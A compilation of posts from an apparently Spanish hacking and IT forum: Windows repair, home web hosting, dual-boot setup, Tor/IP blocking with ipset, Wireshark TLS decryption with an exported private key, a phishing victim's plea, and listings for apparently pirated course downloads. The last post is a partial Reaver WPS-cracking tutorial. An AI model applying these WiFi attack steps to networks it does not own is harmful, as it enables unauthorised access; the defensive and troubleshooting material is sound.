    3. Quizá veas un resumen de lo que va a pasar con la restauración. Échale un vistazo y pulsa Siguiente. El equipo se reinicia y empieza la restauración.

    IMPORTANTE:

    NO pulses ninguna tecla si aparece un mensaje sobre arrancar el PC desde CD. Tampoco lo hagas si el equipo se reinicia otras veces.

    4. En caso necesario selecciona tu cuenta de Windows y escribe su contraseña (la que uses para entrar en Windows 10). Avanza con Continuar.

    5. Si ves el mensaje de "Insertar los medios de instalación..." introduce el CD de Windows 10 o su disco de recuperación.

    6. Cuando salga el mensaje de contenido listo (si es que sale), pulsa Restaurar.

    7. En principio ya no tienes que hacer nada más hasta que se complete el proceso.



    IMPORTANTE:

    NO pulses ninguna tecla durante el arranque si el PC se reinicia. Quizá se reinicie varias veces.

    8. Al final saldrá la pantalla de bienvenida de Windows 10. Escribe tu contraseña para entrar en caso necesario. Cuando veas el Escritorio de Windows ya puedes sacar el CD. La restauración quizá cree un acceso directo de aplicaciones quitadas. Son programas que se han eliminado con el proceso y que quizá quieras reinstalar.

    Cuando la restauración del PC tampoco solucione el problema queda la opción de restablecer Windows 10.



    PASO 4: Restablece Windows 10



    Restablecer Windows 10 es equivalente a una instalación limpia o de cero. La ventaja respecto es ser más rápida que una reinstalación normal que hagas a mano. Sólo debes usar esta opción como último recurso, si no ha funcionado ninguna otra forma de reparación.

    Cosas importantes

    Necesitas el CD de instalación de Windows 10. Si tienes una imagen ISO suya también sirve crear un CD a partir del ISO.

    Averigua la clave de tu Windows si no las sabes. Es posible que te haga falta indicarla en algún momento.

    El restablecimiento borra TODOS los archivos y programas de tu PC. Si es posible, copia tus cosas en otro sitio ANTES de continuar. Por ejemplo en un pendrive o disco USB.

    Si has instalado Windows 10 sobre un Windows anterior, el restablecimiento puede hacer que tu PC regrese a ese Windows más antiguo. Eso te obligaría a reinstalar Windows 10 cuando termine de restablecerse.

    Restablecer Windows 10

    1. Entra en las opciones de recuperación con los paso 1 de este tutorial.

    2. Haz clic en Solucionar problemas. Y en la nueva ventana selecciona Restablecer tu PC. Elige Windows quieres restablecer si te lo pregunta el asistente. restauración.

    3. El PC se reiniciará. Introduce el CD de Windows 10 cuando un mensaje te pida insertar los medios de instalación.

    4. Si te aparece una ventana informativa, avanza con Siguiente después de leerla. Comenta las cosas importantes de que he hablado antes.

    5. Este paso puede no ser necesario Si tienes varias particiones de disco podrás elegir entre borrar sólo los archivos de la unidad donde está Windows o los de todas las unidades. Lo normal es que convenga elegir la primera opción.

    6. Después hay dos alternativas:

    Quitar solo mis archivos

    Es la más apropiada en general. Ejecuta un borrado rápido del disco duro antes de reinstalar Windows 10.


    Limpiar toda la unidad

    Elige esto sólo si estás restableciendo tu PC para venderlo o porque vayas a desprenderte de él de otro modo. La limpieza hace un borrado riguroso del disco duro para que cueste recuperar tus cosas incluso con programas especiales. Es un modo de proteger tu privacidad.

    7. Después de elegir la opción que sea pulsa Restablecer.

    8. IMPORTANTE: Cuando Windows se reinicie NO presiones ninguna tecla. Tampoco si lo hace otras veces. Completa el proceso haciendo lo que Windows vaya pidiéndote. Cuando tengas dudas, selecciona lo que el asistente te recomiende o la opción predeterminada.

    Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#54


Lo primero a hacer es abrir un puerto para el servidor.

  • Introducir en el navegador la dirección del router, normalmente es : 192.168.1.1
  • Acceder usando la contraseña que se encuentra en la parte inferior de tu router.
  • Ir al apartado "Advance", luego elegir "Port Forwarding".
  • Crear el puerto, modificando el servicio, y digitado una ip cualquiera. Yo pondré (192.168.1.20)

    Lo segundo es modificar la configuración de tu ip a una estática.

  • Clic derecho en el icono de red de la barra de tareas, elegir la opción "centro de red y recurso"
  • En esta ventana elegir "cambiar configuración del adaptador".
  • Clic derecho en el icono de la eternet (la única que abra), y elegir propiedades.
  • Hacer doble clic en la opción "Habilitar el protocolo de Internet versión 4"
  • Cambiar de ip automática, a "introducir la siguiente dirección".
  • Ingresar la ip que configuraron al abrir el puerto (192.168.1.20).
  • Ingresar los dns de tu operador. Listo

    Instalar el xampp

  • La instalación es simple, no hay mayor misterio.
  • Abrir el panel de Xampp y encender los dos servicios principales "Apache" y "MYSql".

    Instalar DUC

    La instalación es muy, muy simple.

  • Para usar el programa debemos de crearnos una cuenta en No IP
  • En el menú, elegir la opción "Add Name Host"
  • Elegir el nombre de host de nuestra preferencia.
  • Nos logeamos en el programa de no ip y elegimos el nombre de host.

    Listo, ya tendremos un servidor web, accesible desde cualquier parte del mundo.

    Esta es la dirección donde se alojara nuestra raíz web.

    C:/xampp/htdocs

    Vídeo Tutorial donde se explica todo



    Autor: Aoi Tsuki Blog
    Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#55


Datos técnicos
.MP4 | 800x600 px | 350 MB | Spanish | Formadores: Escuelahacker Online | 4 horas (20 Clases) | Nivel de habilidad: Todos los niveles | Fecha de publicación: 2013 | Udemy


Información de: Curso El uso de una Consola o Terminal Segura con SSH

Curso Terminal Segura con SSH. Aprenda el uso del protocolo SSH de manera básica y sencilla al establecer una conexión por terminal hacia servidores y equipos informáticos remotamente.

En estos tiempos en el uso de internet es importante usar medios de comunicación que proporcionen encripción. En esta serie de videos veremos como usar la terminal de Linux y Windows de manera segura usando el protocolo SSH. Veremos el uso de buenas practicas al usar el protocolo SSH con otras utilidades y algunas recomendaciones.

Este curso es para el usuario con conocimientos básicos de informática y el propósito es crear conciencia al administrar recursos remotamente.

Para alentar el aprendizaje, de regalo pueden ver la Lección 7 y darse cuenta de la importancia de usar protocolos que presten seguridad.

Estaré disponible para contestar cualquier pregunta en menos de 24 horas y tratare de siempre contestar todas sus preguntas.
¿Cuáles son los requisitos?

    Sistema Operativo GNU/Linux Debian, CentOS o cualquier otro.
    Sistema Operativo Microsoft Windows XP o Windows 7
    Conexión a Internet.
    De no poseer una PC extra se recomienda el uso te programas de virtualización como por ejemplo VirtualBox.
    Conocimientos básicos de redes.

¿Qué voy a aprender en este curso?

    ¡Más de 20 clases y 4 horas de contenido!
    Al finalizar el curso el alumno comprenderá la importancia de usar medios de comunicación remota que proporcionen encripción ó encriptación.
    El alumno aprenderá el uso de herramientas nuevas al establecer conexiones remotas.
    El alumno podra configurar a un nivel básico un servidor SSH

¿A quién está dirigido?

    Usuarios con conocimientos básicos en informática.


Capturas del curso








Descargas

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Password: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Fuente: descargasnsn
#56
Curso Administración avanzada de servidor Linux. Aprende a administrar un servidor LAMP

Aprende a transformar tu servidor Linux en un completo servidor web con Ubuntu Server. En este curso te enseñaremos a convertir un servidor Linux en un servidor web con Apache, MySQL, y PHP.

José Vicente Carratalá te presenta su curso Administración avanzada de servidor Linux. Aprende a administrar un servidor LAMP.

En este curso video2brain aprenderás paso a paso a convertir tu servidor Linux en un completo servidor web capaz de servir aplicaciones con el stack LAMP: Apache, MySQL y PHP sobre Linux. En concreto, te mostraremos dos maneras de configurar este tipo de servidores.

En primer lugar, desde una instalación completa y desde cero, activaremos LAMP dentro de las opciones de instalación. En segundo lugar sobre un servidor ya instalado te mostraremos cómo descargar e instalar los servicios uno a uno. Y no solo esto: además instalaremos un servidor FTP para poder comunicarnos con el exterior, y demostraremos el funcionamiento del servidor instalando phpMyAdmin y WordPress.

El curso contará con los siguientes aspectos destacables: Selección de LAMP desde la instalación, instalación individual de Apache, PHP y MySQL, instalación de un servidor FTP, configuración de Apache y PHP, instalación de phpMyAdmin, instalación de WordPress.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Password: d3s3rt0r
#57
Cuando de repente tu PC deja de funcionar se nos viene el mundo encima y a veces no sabemos como encontrar la avería porque no sabemos como empezar a buscarla. En el siguiente ordinograma veremos como acorralar la avería según vayamos avanzando a las preguntas que se nos piden en el ordinograma. Será una pequeña ayuda para aquellos que no saben por donde empezar a la hora de buscar ese fallo que nos impide iniciar nuestro ordenador.








Una vez seguido este ordinograma será más fácil realizar preguntas a aquellos usuarios más avanzados para poder cercar el problema.

#58

Ponle punto final a tus dudas sobre la configuración de arranque doble sin antes desfallecer y sigue algunas recomendaciones.

No hace falta decirlo, pero Windows domina claramente el mercado de sistemas operativos para computadoras. Existen muy pocas alternativas al sistema operativo de Microsoft que no sean Mac OS y las distribuciones Linux, aunque éstas últimas las encontramos en diferentes variantes y para todos los gustos. Sea bienvenido aquel que lo sabe y no se atreve a dejar Windows, porque no es necesario para probarlas una a una.

La mayor preocupación de todos ellos es que, aparentemente, como Windows 8 y 8.1, el nuevo Windows 10 sería celoso con otros sistemas operativos, limitando su instalación. Apuntaban al Secure Boot, habilitado de forma nativa en computadoras modernas, una característica que en la mayoría de ellas es posible desactivar. Así el usuario podría instalar un sistema operativo Linux si le apeteciera.

Pero como usuario de Windows 10 y explorador del mundo Linux, puedo decirles que el drama es innecesario. Por ello en esta guía abordaremos algunas recomendaciones para la instalación de un sistema operativo Linux junto a Windows 10 sin preocuparse de lo que muchas veces se dice en internet sin fundamento. Además, nunca es tarde para compartir una experiencia, mejor aún si ésta sirve de base para futuras exploraciones.

Olvida que Windows 10 es celoso con otros sistemas operativos


No sabría de qué otra forma decirlo, pero no es cierto que Windows 10 no permita la instalación de otros sistemas operativos, en este caso, basados en el núcleo Linux. Para muchos ha sido razón suficiente para no actualizar desde Windows 7 u 8.1, algo que ni siquiera afecta a un sistema previamente configurado con arranque doble.

Es importante que a la hora de instalar un sistema operativo junto a Windows 10 dejemos de creer que algún inconveniente surgirá, y si sucede, no es necesario preocuparse por él. Habiendo entendido este paso si es necesario, pasemos de lleno a las recomendaciones para configurar el arranque doble.

Elije una distribución Linux de tu agrado


Como mencionaba anteriormente, hay distribuciones Linux para todos los gustos, un mundo de sistemas operativos basados en Debian, Ubuntu, Arch y un largo etcétera, incluso algunas creadas desde cero. En esta guía no se tomará en cuenta alguna en específico.

En realidad, sólo diré que ha sido probada con Ubuntu y distribuciones derivadas, como Elementary OS, Deepin 15 y Chromixium, además de otros como Solus Project (anteriormente Evolve OS). Puedes explorar en DistroWatch y seleccionar alguna que sea de tu agrado. Yo he seleccionado un par.

Configuración de la memoria USB


Una vez seleccionada la distribución Linux de tu agrado, el paso siguiente es configurar una USB con la imagen del sistema operativo, haciendo a un lado la opción —ahora un tanto anticuada— de grabarla en un disco. Algunas distribuciones ofrecen su propia herramienta de configuración de arranque, pero cuando no es así, tenemos una gran alternativa.

Rufus es un programa portable, sencillo y liviano que servirá para configurar una memoria USB como dispositivo de arranque para instalar la distribución Linux seleccionada. Basta con descargar la herramienta, seleccionar la memoria USB a formatear y la imagen de disco que se desea grabar. El resto no dependerá de nosotros.

Haz espacio para el nuevo inquilino

Como has de saber, para instalar un sistema operativo se requiere formatear el disco duro. Podríamos decir que instalar Windows en una computadora es el equivalente a instalar un programa en el mismo sistema operativo. Sin embargo, instalar un sistema operativo Linux puede ser de la misma forma, intuitivo, aunque algunos prefieren configurar la tabla de particiones.

En cualquiera de ambos casos será necesario hacer espacio para el nuevo inquilino que compartirá el arranque doble con Windows 10. Para ello, debemos hacer clic derecho en el menú inicio y a continuación seleccionar la opción Administración de discos, herramienta del sistema operativo para administrar discos y sus particiones.


Ahí ubicaremos la partición primaria donde se encuentra instalado Windows 10. También identificaremos la capacidad de almacenamiento y el espacio libre. Hacemos clic derecho en ella y seleccionamos la opción Reducir volumen..., la cual abrirá una ventana que nos permitirá especificar el espacio en MB que dejaremos sin formato, necesarios para instalar el nuevo sistema operativo.

Siempre se recomienda dejar más de 15 GB libres, aunque una recomendación sería dejar como mínimo 50 GB de espacio libre, suficientes para configurar una triada de particiones durante la instalación del sistema operativo o instalar sin particionar manualmente, como sea conveniente.

Antes de instalar, prepara tu computadora


Que no te gane el desespero, pues antes deberás configurar la secuencia de arranque de tu computadora. Para ello debemos saber de antemano bajo qué interfaz de firmware trabaja el equipo, ya sea con BIOS o el nuevo estándar, UEFI, el cual tiene habilitado por defecto el modo Secure Boot.

Mientras en una vieja computadora con Windows 7 basta con modificar la secuencia de arranque o seleccionar un dispositivo al inicio, en un equipo UEFI puede ser necesario desactivar la característica Secure Boot, aunque cabe mencionar que algunas distribuciones Linux solucionaron el inconveniente y ya no se requiere realizar esta modificación.



En una computadora con UEFI, desactivar Secure Boot es tan fácil como ir al Menú inicio &gt; Inicio/Apagado y mantener presionado el botón Shift seleccionando la opción para Reiniciar. Aparecerá un menú de opciones avanzadas que oculta las Configuraciones del Firmware UEFI en Solucionar problemas Opciones Avanzadas. Ya en las configuraciones de UEFI, encontrarás la opción para deshabilitar el Secure Boot.

A partir de ahora sólo tendrás que configurar la secuencia de arranque para darle prioridad a la memoria USB o establecerla como dispositivo de arranque por defecto. En algunas computadoras no es necesario, ya que en el arranque se puede acceder a una lista de dispositivos de la misma manera que se puede ingresar al BIOS o UEFI.


Si estás listo, reinicia tu PC y comienza la instalación

Ahora sí, asegúrate de que la memoria USB previamente configurada esté conectada a tu computadora, o el primer reinicio será en vano. También toma en cuenta que si no cambiaste la secuencia de arranque el firmware dará prioridad al dispositivo configurado por defecto.



Durante la instalación puedes seleccionar la opción para instalar junto a Windows 10 —si lo detecta—, aunque siempre es mejor configurar las particiones manualmente. En ese caso, puedes seleccionar una partición raíz dónde instalar la distribución Linux sin complicarte la existencia, o mejor, configurar una tabla de particiones compuesta por /boot, /root, /swap y /home.


Conservar el MBR de Windows 10


Por un lado, si quieres que GRUB se encargue de administrar el arranque, no cambies la partición de instalación. Pero si quieres conservar el registro de arranque maestro (o MBR) de Windows 10 con estilo metro, selecciona la partición /boot como destino de instalación del GRUB.

Si optaste por la segunda opción, te darás cuenta que al finalizar la instalación de la distribución Linux la computadora iniciará con Windows 10, ignorando que otro sistema operativo está instalado., pero no te preocupes, no es un problema, y si lo fuera, tiene solución.



EasyBCD es un programa gratuito (registro de correo requerido) para Windows que te permitirá configurar el cargador de arranque, con el cual podrás añadir una entrada a la distribución Linux instalada con unos cuantos clics. Basta con ir a Añadir entrada, Sistemas Operativos Linux/BSD y ahí seleccionar el tipo de arranque, establecer un nombre e identificar dónde fue instalado el GRUB.

Tras haber configurado la entrada, en el próximo reinicio verás a Windows 10 compartir lugar en el arranque con el nuevo sistema operativo sin preocuparte de futuros conflictos con el GRUB, ya que éste sólo funcionará como puerta de acceso a la distribución Linux sin tomar el papel que le corresponde al MBR de Windows.

Estás listo para una experiencia dual

Instalar un sistema operativo basado en Linux junto a Windows 10 no fue tan caótico después de todo, ¿o sí? Salvo el caso de aquellos que encontraron imposible desactivar el Secure Boot en sus computadoras, no hay razón para decir "no" a la exploración de distribuciones Linux.

Que sirva como introducción al mundo de sistemas operativos que por mucho tiempo han esperado "su año", aunque podría decirse que siempre lo han tenido, pues opciones para probar hay muchas, sólo falta quiénes se atrevan a experimentar algo nuevo, y ahora no tienen excusa para no hacerlo. Coméntame como es tu experiencia con linux y recuerda dejarme todos tus bits

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#59
Mientras que muchos consideran conveniente actualizar a Windows 10, otros no se atreven siquiera a echar un vistazo a esta versión del sistema operativo Windows. Aseguran que Windows 7 es por mucho el mejor de su tipo, mientras que los usuarios de Windows 8.1 prefieren mantenerse en el anonimato, por alguna u otra razón. Sería una lástima que Microsoft los presionara para actualizar el sistema operativo, sí o sí.

Por mucho que se resistan, los usuarios no tendrán otra opción más que deshabilitar la instalación automática de actualizaciones de Windows Update o usar alguna herramienta como GWX Control Panel para bloquearlas. Sin embargo, hay una opción mejor que cualquier otra conocida y se encuentra disponible en forma de script. Aegis parece ser la herramienta definitiva para evitar a toda costa la actualización a Windows 10.

Está comprimida en un archivo ZIP con varios scripts que contienen comandos de línea de Windows, los cuales se pueden modificar mediante el Bloc de notas o WordPad. El archivo stacl.exe es el que tomará las riendas para gestionar los permisos de Windows una vez que aegis.cmd sea ejecutado como administrador desde el menú contextual, pero antes se debe descomprimir el contenido, con información de gHacks.



A partir de entonces, Aegis se encargará de bloquear u ocultar el directorio donde se descargan los archivos necesarios para actualizar a Windows 10, como GWX (Obtener Windows 10), además de OneDrive, Wi-Fi Sense y el servicio de telemetría. Paralelamente, desinstala o deshabilita actualizaciones de 31 KB, 31 tareas programadas, desinstala la herramienta de seguimiento DiagTrack y deshabilita el servicio de Registro Remoto.

Pero claro, eso no lo es todo, pues además bloquea las direcciones IP de los hosts (o anfitriones) que proveen las actualizaciones directamente de Microsoft, razón por la cual Aegis se actualiza frecuentemente. Por último, el script se encarga de cambiar la configuración de Windows Update para verificar y notificar si hay actualizaciones disponibles en lugar de descargar e instalarlas automáticamente.

Aegis está disponible para su descarga desde la comunidad de Voat (vía Mega), subida por el usuario thepower hace 4 meses. La última actualización se llevó a cabo el 17 de diciembre y en la publicación del usuario puedes encontrar más detalles técnicos sobre la herramienta.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#60
Sin duda las redes TOR han adquirido un protagonismo considerable en estos últimos años. Ya debemos saber que no siempre TOR, se usa para realizar actos delictivos sino también para evadir censuras en países autoritarios y dónde la democracia y libertad de expresión es un lujo escaso.

No obstante, nosotros siempre nos centramos en las posibilidades que puedan dar las redes TOR, tanto ofensivamente como defensivamente.

Hoy toca ser defensivos, y vamos a ver como poder parar de forma simple, visitas desde redes TOR a un servicio apache nuestro, publicado en Internet. Las reglas pararán cualquier intento de conexión pero utilizaremos apache como sonda de prueba.

La idea me surgió hace tiempo pero hoy he podido plasmarla en el artículo. Y es que entrando en pequeños debates de como mejorar servicios de Firewalls conocidos, con un gran profesional al que aprovecho y le mando saludos, me propuse hacer algo básico para trasladar mi idea y/o ponerla en práctica. Empecemos pues:

La idea: No permitir accesos desde redes TOR a nuestro servidor y de paso, bloquear IPs que hayan sido reportadas o estén listadas en repositorios dedicados a recopilar esto.

¿Qué vamos a usar?

Lo primero que haremos será instalarnos IPSet. IPSet es un "añadido" del kernel de Linux. Permite configurar diferentes IPs, MACs, puertos, etc... para cargarlas desde IPTables. El por qué de usarlo es porque permite cargar miles de direcciones IP y solamente cargarla con una línea de IPTables. Sino usáramos esto, tendría que ser el proceso a "manopla" y es inviable a no ser que tengáis mucho tiempo u os montéis un script, que es lo que hacemos nosotros.

El proceso es el de siempre para instalar en Debian/Kali:

Código: bash
apt-get install ipset


Una vez hecho esto, procederemos a la descarga de un script que funciona a las mil maravillas, además de completo, de trick77. Con este programita solucionaremos gran parte del "problema" por lo que seguiremos parte del README aunque haremos algunas aclaraciones para que sea todo 100% operativo así como alguna modificación del código inicial.

Código: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Guardamos en una ruta "popular" de nuestro equipo o VM aunque lo ideal para ponerlo en producción es meterlo en la ruta /usr/local/sbin/.Es un script de Shell de Bash por lo que la extesión será .sh.

Una vez decidido dónde queremos tener alojado nuestro script vamos a otorgarle permisos de ejecución con:

Código: bash
chmod +x /ruta/torblock/script.sh


Creamos una carpeta nueva dónde alojaremos la carpeta principal de IPSet:

Código: bash
mkdir -p /etc/ipset-blacklist


A continuación procedemos a descargar el fichero de configuración que contiene las premisas en las que se basarán nuestros bloqueos.

Podemos descargarlo de: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y lo situaremos en /etc/ipset-blacklist/

Decir que el fichero de configuración ipset-blacklist.conf contendrá feeds de diferentes tipos de IPs (maliciosas, TOR, spam, etc...)



Estas líneas pueden comentarse para que no realicen la descarga del listado de IPs que queramos excluir. Personalmente, creo que no está de más tener toda la lista en funcionamiento para bloquear la mayoría de IPs que su origen sea dudoso. Nosotros vamos a dejarlo como está, aunque si queréis cambiar o añadir otros servicios, también es válido.

Hecho esto, procederemos a ejecutar el script para que empiece a descargar listados de IPs y trasladarlos a nuestro fichero ipset-blacklist.restore

Usaremos:

Código: bash
./torblock.sh /etc/ipset-blacklist/ipset-blacklist.conf




En la anterior captura se aprecia la ejecución del script que, como decimos, descarga listados de IPs tanto TOR, maliciosas, de SPAM, etcétera... También se ocupa automáticamente de crear el contenedor IPSet, que es un almacenamiento que albergará dichas IPs. Básicamente emplea un comando para crear este contenedor parecido a:

Código: bash
ipset create blacklist [b]hash[/b]:net hashsize 4096


También el script si analizáis el código, añade automáticamente esto:

Código: bash
[i]iptables -I INPUT 1 -m set –match-set blacklist src -j DROP[/i]


Qué es la regla IPTables que llama al contenedor "blacklist" y hace un bloqueo total del contenedor, el cual, como venimos diciendo, contiene las miles de IPs maliciosas.



En esta captura se aprecia una pequeña muestra de la cabecera del fichero que contiene las IPs que hemos descargado de los repositorios.

Hemos llamado el script de trick77 como No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para que sea más identificativo a la hora de identificarlo y/o configurarlo de forma automática. No obstante hemos modificado algunas premisas para adaptarse mejor a los aplicativos en dónde tenemos esto testeando. La siguiente ruta que aparece junto a la llamada del script, es indicarle la configuración que tomará el script para su ejecución.

Importante: Una de las modificaciones que hemos hecho en el código es añadir una simple línea llamada:

Código: bash
ipset restore &lt; /etc/ipset-blacklist/ip-blacklist.restore


¿Por qué?¿Qué hace esto?

Por la sencilla razón de que si lo integramos, al cronearlo, automáticamente también se actualiza el "contenedor" IPSet. Lo que hace esta línea de código es coger del fichero .restore las nuevas IPs y refrescar la lista.

¿Y si quiero anular el efecto de bloqueo?

  • iptables –D INPUT X donde X es el número del listado de las reglas que tengas. Nosotros en el servidor de pruebas tenemos 1, pues sería 1 solo. Otros servidores pueden tener cientos.
Recopilemos:

  • Tenemos un script llamado No tienes permitido ver los links. Registrarse o Entrar a mi cuenta que nos actualiza las IPs maliciosas (TOR, Spam, etc...) nos genera el contenedor IPSet donde irán dichas IPs y generará una regla IPTables para bloquear.
Mejoras:

– Meter el script de actualización en /etc/rc.local para asegurar su ejecución al inicio del sistema.
– Crontab: Meterle una línea al Cron para que cada X tiempo se ejecute y tenga actualizadas las listas de IPs

Directorio de pruebas:



Visitando el sitio con Firefox con IP Pública:



Visitando el sitio con TorBrowser:



Con esto ya no hay excusa para impedir accesos a nuestros servidores o sitios publicados en Internet. Si no necesitamos/interesa visitas desde redes de anonimato ¿por qué permitirle el acceso?
Estamos, de paso, realizando uno de los pasos importantes a la hora de securizar cualquier dispositivo/servidor, que es reducir la superficie de exposición de ataques.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#61
Seguramente en alguna ocasión habéis utilizado No tienes permitido ver los links. Registrarse o Entrar a mi cuenta(analizador de tráfico de red: sniffer) para analizar el tráfico de vuestra red en busca de detectar algún comportamiento anómalo, analizar el tráfico de red o simple curiosidad de saber que está pasando.​ Como sabéis en Lync el tráfico entre servidores va protegido vía MTLS y de cliente a servidor vía TLS, aquí tenéis una tabla resumida de cómo se protegen los distintos flujos de datos:



El problema viene dado cuando queréis ver porque el cliente Lync no conecta, o que tipo de DSCP utiliza nuestro cliente Lync cuando iniciamos una conferencia, etc.. y nos encontramos con esto....



Como se puede observar el tráfico está cifrado y sería imposible revisar nada, hasta aqui todo correcto. Pero claro, si queremos analizar cúal es el posible problema que tenemos resultaría imposible. Con Wireshark (y otras herramientas) podemos descrifrar el tráfico SSL (descifrar no es igual a "juankear" ni similar) para poder analizarlo. Para esto necesitamos tener el certificado que utiliza el servidor al cual nos queremos conectar con su clave privada, de tal forma que tenemos que exportarlo desde el servidor con ella. Si no tenemos la clave privada  no podemos hacer nada,  para ello debemos tener acceso a ello. De ahí el comentario anterior de que no estamos hackeando nada de nada, puesto que el certificado con su clave privada la exportamos nosotros. Este artículo solo predente mostrar un procedimiento que debéis seguir para analizar el tráfico SSL o TLS que utiliza Lync (o cualquier otro servicio) para cifrar las comunicaciones. Una vez que tenemos nuestro certificado exportado con su correspondiente clave privada: (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)



Demos convertir el PFX a PEM, que es el formato que Wireshark puede utilizar y para ello utilizaremos No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Una vez instalado debemos ejecutar los siguientes comandos:

Código: dos
openssl pkcs12 -nodes -in SIP.pfx -out sip.pem -nocerts -nodes
openssl rsa -in sip.pem -out sipout.pem




Ahora deberíais tener un fichero con el nombre sipout.pem (cada uno que ponga el nombre que quiera) similar a este (sin los puntitos, esto lo he puesto yo)

-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAiFBWj/E7y6MAMUWacV2aeSpt/j2wHzB7xIYBCMnJy0u869eb
...
...
...
...
...
...
...
...
...
...
...
...
ufZSuWUFoiu1XPS6vWPtQ8VRjb0a4hGXSMYDxyupDgEAgRDIMN0jyW1PklbsOZOb
aJWQWC5UQuoWEP4gw+3aC87UTGrk8U10X0DpQdfyD3Bjwwvai3mEYw==
-----END RSA PRIVATE KEY-----




Ahora debemos configurar nuestro Wireshark para que utilice el fichero de clave privada, para ello abrimos el Wireshark y vamos a Edit - Preferences (Shift+Ctrl+P)



Desplegamos la opción de Protocol, seleccionamos SSL y pulsamos en Edit...



Pulsamos en New



Y configuramos las siguientes opciones:

IPAddress: IP del servidor en donde esté instalado el certificado
Puerto: 443
Protocolo: HTTP
Key File: Elegimos el fichero que anteriormente hemos convertido a .PEM



Pulsamos en OK



Y por último vamos a configurar el fichero de registro que se creará en los procesos de descifrado (información muy útil) y pulsamos en Apply para iniciar el proceso de descifrado de las capturas actuales



Si ahora abrimos el fichero de LOG, veremos que se están procesando correctamente, por lo que podremos ver el tráfico capturado de forma "legible"



Abrimos de nuevo el Wireshark, capturamos algo de tráfico y pulsamos en Follow SSL Stream




Nota: Si elegimos la opción Follow SSL Stream sin la configuración del Wireshark adecuada nos mostrará la siguiente pantalla (en blanco)



ahora podemos ver esto, desde luego ya podemos analizar que puede estar sucediendo





El poder descifrar el tráfico resulta muy útil, eso si, debéis tener acceso a la clave privada del certificado. Por otra parte, no deberíais permitir que los certificados instalados en los servidores tengan la clave privada como exportable, porque si alguien tiene más habilidad que nosotros nos puede comprometer y mucho la seguridad de nuestra empresa. Este artículo solo viene a representar como podéis analizar el tráfico cifrado con una de las herramientas más utilizadas para analizar tráfico de red, pero podéis hacerlo con otras muchas. En principio solo tiene el fin de  solventar distintos problemas que nos puedan surgir en nuestras implementaciones, como el tráfico están cifrado se nos complica cualquier diagnóstico.

Os dejo también un ejemplo muy ilustrativo de una captura sin tráfico cifrado, pero y si estuviera cifrado? podríamos tardar horas en encontrar cual es el problema



Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#62
Hola compañeros,

Ayer a mi novia le robaron el iPhone 6 Plus en un centro comercial, rápidamente pusimos la denuncia y yo accedí a su cuenta iCloud para poner el iPhone como "perdido", resulta que además configuré para que en caso de localizarlo llamaran a mi número. Una vez hecho esto a los 5 minutos me mandaron un SMS y me llamaron del siguiente número "+190090000" diciendo que se había localizado el iPhone, y también el siguiente SMS:



Pues verán.. Creo que es un Phishing, tonto de mí introduci el ID de iCloud, y ahora accedo al iCloud y me parece que han quitado el dispositivo, además si me voy a la configuración de iCloud me dice que se ha registrado un inicio de sesión con iOS 8 (el iPhone tenía iOS 9) y que además el sistema operativo Yosemite (y no tenemos MAC), así que todo apunta a que los ladrones son bastante especializados en esto, porque primero han hecho una página falsa, en segundo lugar han sabido remover el dispositivo.

Os pido ayuda por si sabéis como puedo localizar el servidor o incluso autor de ese Fake ya que no tengo prácticamente nada para bloquear el disposito, solamente bloquearlo por IMEI.




Agradezco cualquier sugerencia, gracias!
#63
¿Qué es reaver?  Reaver  es una herramienta que implementa un ataque de fuerza bruta contra el WiFi Protected Setup (WPS) PIN registrador que se utiliza para recuperar contraseñas WPA/WPA2

Bien ahora que ya sabemos que es Reaver y para que se utiliza, vamos a entrar un poco en materia. Lo 1º que debemos de hacer es poner nuestra tarjeta de red en modo monitor, para ello abrimos una terminal y ponemos la siguiente línea de comandos, ver imagen:

Código: php
Airmon-ng start wlan0


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Como podemos observar en la imagen anterior, ya hemos puesto nuestra tarjeta en modo monitor, en este caso la mia será mon0.

A continuación lo que necesitamos para que nuestra operación tenga éxito, es localizar una red, la cual disponga del WPS (WiFi Protected Setup )habilitado , para ello hay varios métodos de conseguirlo, yo me voy a servir de la herramienta WIFITE, ya incluida en nuestra distribución Backtrack5 y Kali Linux. Para ejecutar el WIFITE, en Kali Linux que es el caso, abrimos una terminal y simplemente escribimos  wifite y le pulsamos   intro, ver imagen:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Una vez hemos puesto wifite y pulsado enter, la herramienta empezará a scannear sola la red y al mismo tiempo, nos irá marcándo las redes que tienen el WPS(WiFi Protected Setup) habilitado, ver imagen:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Como podemos ver en la imagen anterior, ya nos ha scanneado la red y yo voy a seleccionar la red llamada wlan_4D55 (ya que esta es mía )

Ahora que ya sabemos que la red que vamos a auditar tiene habilitado el WPS (WiFi Protected Setup ) sabemos que es vulnerable al ATAQUE  con REAVER.

El siguiente paso que necesitamos para crackear la red, es descubrir el BSSID de  esta, para ello nos serviremos de la herramienta airodump-ng para hacer esto lo único que tenemos que hacer es abrir una terminal y escribir en ella la línea de comandos siguiente:

Código: php
Airodump-ng mon0


Y automáticamente empezará a scannear la red y a mostrarnos los BSSID de las mismas, entre los que se encontrará el de nuestra red, ver imagen:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Como podemos apreciar en la imagen anterior, ya tenemos descubierto el  BSSID de la red que estamos auditando, ahora con estos datos ya podemos comenzar con el ataque con REAVER para recuperar nuestra contraseña sin necesidad de utilizar diccionarios.

